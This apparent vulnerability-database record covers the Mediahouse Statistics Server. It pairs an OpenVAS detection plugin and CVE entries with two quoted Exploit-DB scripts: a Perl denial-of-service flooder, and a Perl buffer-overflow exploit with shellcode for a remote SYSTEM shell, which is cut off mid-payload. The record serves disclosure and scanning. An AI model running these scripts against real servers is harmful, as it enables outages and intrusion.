ID OPENVAS:136141256231010748 Type openvas Reporter Copyright (C) 2001 SecuriTeam Modified 2020-05-08T00:00:00
Description
We detected the remote web server as a
Mediahouse Statistics web server. This web server suffers from a security
vulnerability that enables attackers to gain sensitive information on the
current logged events on the public web server (the server being monitored
by MediaHouse).
This information includes: who is on (currently surfing users), the user
# OpenVAS Vulnerability Test
# Description: Mediahouse Statistics Web Server Detect
#
# Authors:
# Noam Rathaus <noamr@securiteam.com>
# Script audit and contributions from Carmichael Security <http://www.carmichaelsecurity.com>
# Erik Anderson <eanders@carmichaelsecurity.com>
# Added BugtraqID and CVE
#
# Copyright:
# Copyright (C) 2001 Noam Rathaus <noamr@securiteam.com>
# Copyright (C) 2001 SecuriTeam
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2,
# as published by the Free Software Foundation
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
#
# Could also cover BugtraqID:734, CVE:CVE-1999-0931
if(description)
{
script_oid("1.3.6.1.4.1.25623.1.0.10748");
script_version("2020-05-08T08:34:44+0000");
script_tag(name:"last_modification", value:"2020-05-08 08:34:44 +0000 (Fri, 08 May 2020)");
script_tag(name:"creation_date", value:"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)");
script_bugtraq_id(1568);
script_tag(name:"cvss_base", value:"7.5");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:P/A:P");
script_cve_id("CVE-2000-0776");
script_name("Mediahouse Statistics Web Server Detect");
script_category(ACT_GATHER_INFO);
script_copyright("Copyright (C) 2001 SecuriTeam");
script_family("Web Servers");
script_dependencies("gb_get_http_banner.nasl");
script_require_ports("Services/www", 80);
script_mandatory_keys("Statistics_Server/banner");
script_tag(name:"solution", value:"Block the web server's port number on your Firewall, and
upgrade to the latest version if necessary.");
script_tag(name:"summary", value:"We detected the remote web server as a
Mediahouse Statistics web server. This web server suffers from a security
vulnerability that enables attackers to gain sensitive information on the
current logged events on the public web server (the server being monitored
by MediaHouse).
This information includes: who is on (currently surfing users), the user's
actions, customer's IP addresses, referrer URLs, hidden directories, web
server usernames and passwords, and more.
Some versions of the product also suffer from a flaw that allows attackers
to overflow an internal buffer causing it to execute arbitrary code.");
script_tag(name:"solution_type", value:"VendorFix");
script_tag(name:"qod_type", value:"remote_banner");
exit(0);
}
include("http_func.inc");
port = http_get_port(default:80);
buf = http_get_remote_headers(port:port);
if(!buf)
exit(0);
if(egrep(pattern:"^Server: Statistics Server", string:buf)) {
buf = strstr(buf, "Location: ");
buf = buf - "Location: ";
subbuf = strstr(buf, string("\n"));
buf = buf - subbuf;
buf = buf - raw_string(0x0D);
soc = http_open_socket(port);
if(soc) {
req = http_get(item:buf, port:port);
send(socket:soc, data:req);
buf = http_recv(socket:soc);
http_close_socket(soc);
if ("Statistics Server " >< buf) {
buf = strstr(buf, "<TITLE>Statistics Server ");
buf = buf - "<TITLE>Statistics Server ";
subbuf = strstr(buf, "</TITLE>");
buf = buf - subbuf;
buf = buf - "</TITLE>";
version = buf;
buf = "Remote host is running Statistics Server version: ";
buf = buf + version;
if(ereg(pattern:"(([0-4]\.[0-9].*)|5\.0[0-2])", string:version)) {
report = string("According to its version number, the remote MediaHouse\n",
"Statistics Server is vulnerable to a buffer overflow that\n",
"allows anyone to execute arbitrary code as root.\n\n",
"Solution: Upgrade to version 5.03 or newer");
security_message(data:report, port:port);
} else {
security_message(port:port);
}
}
}
}
exit(99);
{"id": "OPENVAS:136141256231010748", "type": "openvas", "bulletinFamily": "scanner", "title": "Mediahouse Statistics Web Server Detect", "description": "We detected the remote web server as a\n Mediahouse Statistics web server. This web server suffers from a security\n vulnerability that enables attackers to gain sensitive information on the\n current logged events on the public web server (the server being monitored\n by MediaHouse).\n\n This information includes: who is on (currently surfing users), the user", "published": "2005-11-03T00:00:00", "modified": "2020-05-08T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "http://plugins.openvas.org/nasl.php?oid=136141256231010748", "reporter": "Copyright (C) 2001 SecuriTeam", "references": [], "cvelist": ["CVE-1999-0931", "CVE-2000-0776"], "lastseen": "2020-05-12T15:08:27", "viewCount": 2, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2000-0776", "CVE-1999-0931"]}, {"type": "openvas", "idList": ["OPENVAS:10748"]}, {"type": "exploitdb", "idList": ["EDB-ID:20148", "EDB-ID:19562"]}, {"type": "osvdb", "idList": ["OSVDB:1119", "OSVDB:1507"]}], "modified": "2020-05-12T15:08:27", "rev": 2}, "score": {"value": 5.9, "vector": "NONE", "modified": "2020-05-12T15:08:27", "rev": 2}, "vulnersScore": 5.9}, "pluginID": "136141256231010748", "sourceData": "# OpenVAS Vulnerability Test\n# Description: Mediahouse Statistics Web Server Detect\n#\n# Authors:\n# Noam Rathaus <noamr@securiteam.com>\n# Script audit and contributions from Carmichael Security <http://www.carmichaelsecurity.com>\n# Erik Anderson <eanders@carmichaelsecurity.com>\n# Added BugtraqID and CVE\n#\n# Copyright:\n# Copyright (C) 2001 Noam Rathaus <noamr@securiteam.com>\n# Copyright (C) 2001 SecuriTeam\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\n# Could also cover BugtraqID:734, CVE:CVE-1999-0931\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.10748\");\n script_version(\"2020-05-08T08:34:44+0000\");\n script_tag(name:\"last_modification\", value:\"2020-05-08 08:34:44 +0000 (Fri, 08 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)\");\n script_bugtraq_id(1568);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_cve_id(\"CVE-2000-0776\");\n script_name(\"Mediahouse Statistics Web Server Detect\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2001 SecuriTeam\");\n script_family(\"Web Servers\");\n script_dependencies(\"gb_get_http_banner.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"Statistics_Server/banner\");\n\n script_tag(name:\"solution\", value:\"Block the web server's port number on your Firewall, and\n upgrade to the latest version if necessary.\");\n\n script_tag(name:\"summary\", value:\"We detected the remote web server as a\n Mediahouse Statistics web server. This web server suffers from a security\n vulnerability that enables attackers to gain sensitive information on the\n current logged events on the public web server (the server being monitored\n by MediaHouse).\n\n This information includes: who is on (currently surfing users), the user's\n actions, customer's IP addresses, referrer URLs, hidden directories, web\n server usernames and passwords, and more.\n\n Some versions of the product also suffer from a flaw that allows attackers\n to overflow an internal buffer causing it to execute arbitrary code.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\n\nport = http_get_port(default:80);\nbuf = http_get_remote_headers(port:port);\nif(!buf)\n exit(0);\n\nif(egrep(pattern:\"^Server: Statistics Server\", string:buf)) {\n\n buf = strstr(buf, \"Location: \");\n buf = buf - \"Location: \";\n subbuf = strstr(buf, string(\"\\n\"));\n buf = buf - subbuf;\n buf = buf - raw_string(0x0D);\n soc = http_open_socket(port);\n if(soc) {\n req = http_get(item:buf, port:port);\n send(socket:soc, data:req);\n buf = http_recv(socket:soc);\n http_close_socket(soc);\n\n if (\"Statistics Server \" >< buf) {\n buf = strstr(buf, \"<TITLE>Statistics Server \");\n buf = buf - \"<TITLE>Statistics Server \";\n subbuf = strstr(buf, \"</TITLE>\");\n buf = buf - subbuf;\n buf = buf - \"</TITLE>\";\n version = buf;\n\n buf = \"Remote host is running Statistics Server version: \";\n buf = buf + version;\n if(ereg(pattern:\"(([0-4]\\.[0-9].*)|5\\.0[0-2])\", string:version)) {\n report = string(\"According to its version number, the remote MediaHouse\\n\",\n \"Statistics Server is vulnerable to a buffer overflow that\\n\",\n \"allows anyone to execute arbitrary code as root.\\n\\n\",\n \"Solution: Upgrade to version 5.03 or newer\");\n security_message(data:report, port:port);\n } else {\n security_message(port:port);\n }\n }\n }\n}\n\nexit(99);\n", "naslFamily": "Web Servers", "immutableFields": []}
{"cve": [{"lastseen": "2021-02-02T05:19:01", "description": "Buffer overflow in Mediahouse Statistics Server allows remote attackers to execute commands.", "edition": 4, "cvss3": {}, "published": "1999-09-30T04:00:00", "title": "CVE-1999-0931", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-1999-0931"], "modified": "2008-09-09T12:36:00", "cpe": ["cpe:/a:mediahouse_software:statistics_server:4.28", "cpe:/a:mediahouse_software:statistics_server:5.0"], "id": "CVE-1999-0931", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-0931", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:mediahouse_software:statistics_server:5.0:*:*:*:*:*:*:*", "cpe:2.3:a:mediahouse_software:statistics_server:4.28:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:19:03", "description": "Mediahouse Statistics Server 5.02x allows remote attackers to execute arbitrary commands via a long HTTP GET request.", "edition": 4, "cvss3": {}, "published": "2000-10-20T04:00:00", "title": "CVE-2000-0776", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2000-0776"], "modified": "2017-10-10T01:29:00", "cpe": ["cpe:/a:mediahouse_software:statistics_server_livestats:5.02"], "id": "CVE-2000-0776", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0776", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:mediahouse_software:statistics_server_livestats:5.02:*:*:*:*:*:*:*"]}], "openvas": [{"lastseen": "2017-07-02T21:10:06", "bulletinFamily": "scanner", "cvelist": ["CVE-1999-0931", "CVE-2000-0776"], "description": "We detected the remote web server as a \nMediahouse Statistics web server. This web server suffers from a security \nvulnerability that enables attackers to gain sensitive information on the \ncurrent logged events on the public web server (the server being monitored \nby MediaHouse).\nThis information includes: who is on (currently surfing users), the user's \nactions, customer's IP addresses, referrer URLs, hidden directories, web \nserver usernames and passwords, and more.\n\nSome versions of the product also suffer from a flaw that allows attackers \nto overflow an internal buffer causing it to execute arbitrary code.", "modified": "2017-04-27T00:00:00", "published": "2005-11-03T00:00:00", "id": "OPENVAS:10748", "href": "http://plugins.openvas.org/nasl.php?oid=10748", "type": "openvas", "title": "Mediahouse Statistics Web Server Detect", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: mediahouse_statistics_web_server.nasl 6040 2017-04-27 09:02:38Z teissa $\n# Description: Mediahouse Statistics Web Server Detect\n#\n# Authors:\n# Noam Rathaus <noamr@securiteam.com>\n# Script audit and contributions from Carmichael Security <http://www.carmichaelsecurity.com>\n# Erik Anderson <eanders@carmichaelsecurity.com>\n# Added BugtraqID and CVE\n#\n# Copyright:\n# Copyright (C) 2001 Noam Rathaus <noamr@securiteam.com>\n# Copyright (C) 2001 SecuriTeam\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ntag_summary = \"We detected the remote web server as a \nMediahouse Statistics web server. This web server suffers from a security \nvulnerability that enables attackers to gain sensitive information on the \ncurrent logged events on the public web server (the server being monitored \nby MediaHouse).\nThis information includes: who is on (currently surfing users), the user's \nactions, customer's IP addresses, referrer URLs, hidden directories, web \nserver usernames and passwords, and more.\n\nSome versions of the product also suffer from a flaw that allows attackers \nto overflow an internal buffer causing it to execute arbitrary code.\";\n\ntag_solution = \"Block the web server's port number on your Firewall, and\nupgrade to the latest version if necessary.\";\n\n# Could also cover BugtraqID:734, CVE:CVE-1999-0931\n\nif(description)\n{\n script_id(10748);\n script_version(\"$Revision: 6040 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-04-27 11:02:38 +0200 (Thu, 27 Apr 2017) $\");\n script_tag(name:\"creation_date\", value:\"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)\");\n script_bugtraq_id(1568);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_cve_id(\"CVE-2000-0776\");\n\n name = \"Mediahouse Statistics Web Server Detect\";\n script_name(name);\n\n summary = \"Mediahouse Statistics Web Server Detection\";\n\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_copyright(\"This script is Copyright (C) 2001 SecuriTeam\");\n family = \"General\";\n script_family(family);\n\n script_dependencies(\"gb_get_http_banner.nasl\");\n script_mandatory_keys(\"Statistics_Server/banner\");\n script_require_keys(\"www/statistics-server\");\n script_require_ports(\"Services/www\", 80);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n exit(0);\n}\n\n#\n# The script code starts here\n#\ninclude(\"http_func.inc\");\n\nport = get_http_port(default:80);\n\n\nif(!get_port_state(port))exit(0);\n\nbuf = get_http_banner(port:port);\n\nif (egrep(pattern:\"^Server: Statistics Server\", string:buf))\n{\n buf = strstr(buf, \"Location: \");\n buf = buf - \"Location: \";\n subbuf = strstr(buf, string(\"\\n\"));\n buf = buf - subbuf;\n buf = buf - raw_string(0x0D);\n soc = http_open_socket(port);\n if (soc)\n {\n req = http_get(item:buf, port:port);\n send(socket:soc, data:req);\n buf = http_recv(socket:soc);\n http_close_socket(soc);\n\n if (\"Statistics Server \" >< buf)\n {\n buf = strstr(buf, \"<TITLE>Statistics Server \");\n buf = buf - \"<TITLE>Statistics Server \";\n subbuf = strstr(buf, \"</TITLE>\");\n buf = buf - subbuf;\n buf = buf - \"</TITLE>\";\n version = buf;\n\n buf = \"Remote host is running Statistics Server version: \";\n buf = buf + version;\n if(ereg(pattern:\"(([0-4]\\.[0-9].*)|5\\.0[0-2])\", string:version))\n {\n # should be a separate plugin ?\n report = string(\"According to its version number, the remote MediaHouse\\n\",\n \t \"Statistics Server is vulnerable to a buffer overflow that\\n\",\n\t\t \"allows anyone to execute arbitrary code as root.\\n\\n\",\n\t\t \"Solution: Upgrade to version 5.03 or newer\");\n security_message(data:report, port:port);\n }\n else\n {\n security_message(port);\n }\n }\n }\n}\n\n\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-02-02T12:08:12", "description": "MediaHouse Software Statistics Server 4.28/5.1 \"Server ID\" Buffer Overflow Vulnerability. CVE-1999-0931. Dos exploit for windows platform", "published": "1999-09-30T00:00:00", "type": "exploitdb", "title": "MediaHouse Software Statistics Server 4.28/5.1 - \"Server ID\" Buffer Overflow Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-1999-0931"], "modified": "1999-09-30T00:00:00", "id": "EDB-ID:19562", "href": "https://www.exploit-db.com/exploits/19562/", "sourceData": "source: http://www.securityfocus.com/bid/734/info\r\n\r\nThe web interface for Statistics Server contains an unchecked buffer which accepts input from the \"Server ID\" field of the login webpage. While the login webpage has a 16 character restriction, this is easily circumventible by editing the HTML to remove the restriction. Entering a string of more than 3773 characters will crash the server. This bug could potentially be used to remotely execute arbitrary code. \r\n\r\n#!/usr/bin/perl\r\n\r\n###############################################################\r\n# Sample DoS against the Mediahouse Statistics Server\r\n# This was tested against 4.28 & 5.01 running on Windows NT 4.0\r\n#\r\n# Only use it to determine if your own Server is vulnerable!\r\n#\r\n# Per Bergehed (per_bergehed@hotmail.com)\r\n#\r\n# http://w1.855.telia.com/~u85513179/security/exploits/mediahouse.html\r\n#\r\n# V1.0 - Check for \"ss?form=statsredir&ID=...\" buffer overflow.\r\n# V1.1 - added check for \"ss?form=setsite&ID=...\" buffer overflow.\r\n#\r\n\r\nuse IO::Socket;\r\n\r\nprint \"############################################################\\n\";\r\nprint \"# Simple DoS-attack against the Mediahouse Statistics Server\\n\";\r\nprint \"# Tested with version 4.28 & 5.01\\n\";\r\nprint \"\\n\";\r\n\r\nif ($#ARGV != 0) \r\n{\r\n die \"-> Please give the host address as argument.\\n\"\r\n}\r\n\r\nopensocket (\"\\n\");\r\nprint $remote \"GET \" . \"ss?setsite=\" . \"A\" x 40000 . \"& HTTP/1.0\\n\\n\";\r\nprint $remote \"GET \" . \"ss?form=statsredir&ID=\" . \"A\" x 40000 . \"& HTTP/1.0\\n\\n\";\r\nclose $remote;\r\n\r\nopensocket (\"\\n-> The server seemed to be vulnerable to this attack\\n\");\r\nclose $remote;\r\ndie \"-> The server does not seem to be vulnerable to this attack\\n\";\r\n\r\nsub opensocket \r\n{\r\n $remote = IO::Socket::INET->new (\r\n Proto => \"tcp\",\r\n PeerAddr => $ARGV[0],\r\n PeerPort => \"http(80)\",\r\n ) || die \"# Can't open http-port on $ARGV[0]$_[0]\";\r\n $remote->autoflush(1)\r\n}\r\n\r\n# EOF", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/19562/"}, {"lastseen": "2016-02-02T13:34:25", "description": "MediaHouse Software Statistics Server LiveStats 5.2 Buffer Overflow Vulnerability. CVE-2000-0776. Remote exploit for windows platform", "published": "2000-08-10T00:00:00", "type": "exploitdb", "title": "MediaHouse Software Statistics Server LiveStats 5.2 - Buffer Overflow Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2000-0776"], "modified": "2000-08-10T00:00:00", "id": "EDB-ID:20148", "href": "https://www.exploit-db.com/exploits/20148/", "sourceData": "source: http://www.securityfocus.com/bid/1568/info\r\n\r\nMediahouse Statistics Server LiveStats is susceptible to a buffer overflow attack if a URL in a GET request contains over 2030 bytes. Depending on the data inserted into the request, the application will crash or can be forced to execute arbitrary code.\r\n\r\n\r\n#!/usr/bin/perl -w\r\n# Statistics Server 5.02x's exploit. \r\n# usage: ./ssexploit502x.pl hostname port\r\n# 00/08/10\r\n# http://www.deepzone.org\r\n# http://deepzone.cjb.net \r\n# http://mareasvivas.cjb.net (|Zan homepage)\r\n#\r\n# --|Zan <izan@deepzone.org>\r\n# ----------------------------------------------------------------\r\n#\r\n# This exploit works against Statistics Server 5.02x/Win2k.\r\n#\r\n# Tested with Win2k (spanish version).\r\n#\r\n# It spawns a remote winshell on 8008 port. It doesn't kill\r\n# webserver so webserver continues running while hack is made.\r\n# When hack is finished webserver will run perfectly too.\r\n#\r\n# Default installation gives us a remote shell with system\r\n# privileges.\r\n#\r\n# overflow discovered by\r\n# -- Nemo <nemo@deepzone.org>\r\n#\r\n# exploit coded by\r\n# -- |Zan <izan@deepzone.org>\r\n#\r\n# ----------------------------------------------------------------\r\n\r\nuse IO::Socket;\r\n\r\n\r\n@crash = (\r\n\"\\x68\",\"\\x8b\",\"\\x41\",\"\\x1d\",\"\\x01\",\"\\x68\",\"\\x41\",\"\\x41\",\"\\x41\",\r\n\"\\x41\",\"\\x68\",\"\\x61\",\"\\x41\",\"\\x41\",\"\\x41\",\"\\x58\",\"\\x59\",\"\\x5f\",\r\n\"\\x2b\",\"\\xc1\",\"\\xaa\",\"\\x33\",\"\\xc9\",\"\\x66\",\"\\xb9\",\"\\x71\",\"\\x04\",\r\n\"\\x90\",\"\\x90\",\"\\x90\",\"\\x68\",\"\\xbd\",\"\\x3e\",\"\\x1d\",\"\\x01\",\"\\x5e\",\r\n\"\\x56\",\"\\x5f\",\"\\x33\",\"\\xd2\",\"\\x80\",\"\\xc2\",\"\\x99\",\"\\xac\",\"\\x32\",\r\n\"\\xc2\",\"\\xaa\",\"\\xe2\",\"\\xfa\",\"\\x71\",\"\\x99\",\"\\x99\",\"\\x99\",\"\\x99\",\r\n\"\\xc4\",\"\\x18\",\"\\x74\",\"\\xaf\",\"\\x89\",\"\\xd9\",\"\\x99\",\"\\x14\",\"\\x2c\",\r\n\"\\xd4\",\"\\x8a\",\"\\xd9\",\"\\x99\",\"\\x14\",\"\\x24\",\"\\xcc\",\"\\x8a\",\"\\xd9\",\r\n\"\\x99\",\"\\xf3\",\"\\x9e\",\"\\x09\",\"\\x09\",\"\\x09\",\"\\x09\",\"\\xc0\",\"\\x71\",\r\n\"\\x4b\",\"\\x9b\",\"\\x99\",\"\\x99\",\"\\x14\",\"\\x2c\",\"\\x1c\",\"\\x8a\",\"\\xd9\",\r\n\"\\x99\",\"\\x14\",\"\\x24\",\"\\x17\",\"\\x8a\",\"\\xd9\",\"\\x99\",\"\\xf3\",\"\\x93\",\r\n\"\\x09\",\"\\x09\",\"\\x09\",\"\\x09\",\"\\xc0\",\"\\x71\",\"\\x23\",\"\\x9b\",\"\\x99\",\r\n\"\\x99\",\"\\xf3\",\"\\x99\",\"\\x14\",\"\\x2c\",\"\\x8b\",\"\\x8d\",\"\\xd9\",\"\\x99\",\r\n\"\\xcf\",\"\\x14\",\"\\x2c\",\"\\x87\",\"\\x8d\",\"\\xd9\",\"\\x99\",\"\\xcf\",\"\\x14\",\r\n\"\\x2c\",\"\\xbb\",\"\\x8d\",\"\\xd9\",\"\\x99\",\"\\xcf\",\"\\x66\",\"\\x0c\",\"\\x17\",\r\n\"\\x8a\",\"\\xd9\",\"\\x99\",\"\\xf3\",\"\\x99\",\"\\x14\",\"\\x2c\",\"\\x8b\",\"\\x8d\",\r\n\"\\xd9\",\"\\x99\",\"\\xcf\",\"\\x14\",\"\\x2c\",\"\\xbf\",\"\\x8d\",\"\\xd9\",\"\\x99\",\r\n\"\\xcf\",\"\\x14\",\"\\x2c\",\"\\xb3\",\"\\x8d\",\"\\xd9\",\"\\x99\",\"\\xcf\",\"\\x66\",\r\n\"\\x0c\",\"\\x17\",\"\\x8a\",\"\\xd9\",\"\\x99\",\"\\x5e\",\"\\x1c\",\"\\xb7\",\"\\x8d\",\r\n\"\\xd9\",\"\\x99\",\"\\xdd\",\"\\x99\",\"\\x99\",\"\\x99\",\"\\x14\",\"\\x2c\",\"\\xb7\",\r\n\"\\x8d\",\"\\xd9\",\"\\x99\",\"\\xcf\",\"\\x66\",\"\\x0c\",\"\\x0b\",\"\\x8a\",\"\\xd9\",\r\n\"\\x99\",\"\\x14\",\"\\x2c\",\"\\xff\",\"\\x8d\",\"\\xd9\",\"\\x99\",\"\\x34\",\"\\xc9\",\r\n\"\\x66\",\"\\x0c\",\"\\x37\",\"\\x8a\",\"\\xd9\",\"\\x99\",\"\\x14\",\"\\x2c\",\"\\xf3\",\r\n\"\\x8d\",\"\\xd9\",\"\\x99\",\"\\x34\",\"\\xc9\",\"\\x66\",\"\\x0c\",\"\\x37\",\"\\x8a\",\r\n\"\\xd9\",\"\\x99\",\"\\x14\",\"\\x2c\",\"\\xb3\",\"\\x8d\",\"\\xd9\",\"\\x99\",\"\\x14\",\r\n\"\\x24\",\"\\xff\",\"\\x8d\",\"\\xd9\",\"\\x99\",\"\\x3c\",\"\\x14\",\"\\x2c\",\"\\x87\",\r\n\"\\x8d\",\"\\xd9\",\"\\x99\",\"\\x34\",\"\\x14\",\"\\x24\",\"\\xf3\",\"\\x8d\",\"\\xd9\",\r\n\"\\x99\",\"\\x32\",\"\\x14\",\"\\x24\",\"\\xf7\",\"\\x8d\",\"\\xd9\",\"\\x99\",\"\\x32\",\r\n\"\\x5e\",\"\\x1c\",\"\\xc7\",\"\\x8d\",\"\\xd9\",\"\\x99\",\"\\x99\",\"\\x99\",\"\\x99\",\r\n\"\\x99\",\"\\x5e\",\"\\x1c\",\"\\xc3\",\"\\x8d\",\"\\xd9\",\"\\x99\",\"\\x98\",\"\\x98\",\r\n\"\\x99\",\"\\x99\",\"\\x14\",\"\\x2c\",\"\\xeb\",\"\\x8d\",\"\\xd9\",\"\\x99\",\"\\xcf\",\r\n\"\\x14\",\"\\x2c\",\"\\xb7\",\"\\x8d\",\"\\xd9\",\"\\x99\",\"\\xcf\",\"\\xf3\",\"\\x99\",\r\n\"\\xf3\",\"\\x99\",\"\\xf3\",\"\\x89\",\"\\xf3\",\"\\x98\",\"\\xf3\",\"\\x99\",\"\\xf3\",\r\n\"\\x99\",\"\\x14\",\"\\x2c\",\"\\x1b\",\"\\x8d\",\"\\xd9\",\"\\x99\",\"\\xcf\",\"\\xf3\",\r\n\"\\x99\",\"\\x66\",\"\\x0c\",\"\\x0f\",\"\\x8a\",\"\\xd9\",\"\\x99\",\"\\xf1\",\"\\x99\",\r\n\"\\xb9\",\"\\x99\",\"\\x99\",\"\\x09\",\"\\xf1\",\"\\x99\",\"\\x9b\",\"\\x99\",\"\\x99\",\r\n\"\\x66\",\"\\x0c\",\"\\x07\",\"\\x8a\",\"\\xd9\",\"\\x99\",\"\\x10\",\"\\x1c\",\"\\x13\",\r\n\"\\x8d\",\"\\xd9\",\"\\x99\",\"\\xaa\",\"\\x59\",\"\\xc9\",\"\\xd9\",\"\\xc9\",\"\\xd9\",\r\n\"\\xc9\",\"\\x66\",\"\\x0c\",\"\\xcc\",\"\\x8a\",\"\\xd9\",\"\\x99\",\"\\xc9\",\"\\xc2\",\r\n\"\\xf3\",\"\\x89\",\"\\x14\",\"\\x2c\",\"\\x9b\",\"\\x8d\",\"\\xd9\",\"\\x99\",\"\\xcf\",\r\n\"\\xca\",\"\\x66\",\"\\x0c\",\"\\xc0\",\"\\x8a\",\"\\xd9\",\"\\x99\",\"\\xf3\",\"\\x9a\",\r\n\"\\xca\",\"\\x66\",\"\\x0c\",\"\\xc4\",\"\\x8a\",\"\\xd9\",\"\\x99\",\"\\x14\",\"\\x2c\",\r\n\"\\x17\",\"\\x8d\",\"\\xd9\",\"\\x99\",\"\\xcf\",\"\\x14\",\"\\x2c\",\"\\x9b\",\"\\x8d\",\r\n\"\\xd9\",\"\\x99\",\"\\xcf\",\"\\xca\",\"\\x66\",\"\\x0c\",\"\\xf8\",\"\\x8a\",\"\\xd9\",\r\n\"\\x99\",\"\\x14\",\"\\x24\",\"\\x0b\",\"\\x8d\",\"\\xd9\",\"\\x99\",\"\\x32\",\"\\xaa\",\r\n\"\\x59\",\"\\xc9\",\"\\x14\",\"\\x24\",\"\\x07\",\"\\x8d\",\"\\xd9\",\"\\x99\",\"\\xce\",\r\n\"\\xc9\",\"\\xc9\",\"\\xc9\",\"\\x14\",\"\\x2c\",\"\\xbb\",\"\\x8d\",\"\\xd9\",\"\\x99\",\r\n\"\\x34\",\"\\xc9\",\"\\x66\",\"\\x0c\",\"\\x03\",\"\\x8a\",\"\\xd9\",\"\\x99\",\"\\xf3\",\r\n\"\\xa9\",\"\\x66\",\"\\x0c\",\"\\x33\",\"\\x8a\",\"\\xd9\",\"\\x99\",\"\\x72\",\"\\xd4\",\r\n\"\\x09\",\"\\x09\",\"\\x09\",\"\\xaa\",\"\\x59\",\"\\xc9\",\"\\x14\",\"\\x24\",\"\\x07\",\r\n\"\\x8d\",\"\\xd9\",\"\\x99\",\"\\xce\",\"\\xc9\",\"\\xc9\",\"\\xc9\",\"\\x14\",\"\\x2c\",\r\n\"\\xbb\",\"\\x8d\",\"\\xd9\",\"\\x99\",\"\\x34\",\"\\xc9\",\"\\x66\",\"\\x0c\",\"\\x03\",\r\n\"\\x8a\",\"\\xd9\",\"\\x99\",\"\\xf3\",\"\\xa9\",\"\\x66\",\"\\x0c\",\"\\x33\",\"\\x8a\",\r\n\"\\xd9\",\"\\x99\",\"\\x1a\",\"\\x24\",\"\\x07\",\"\\x8d\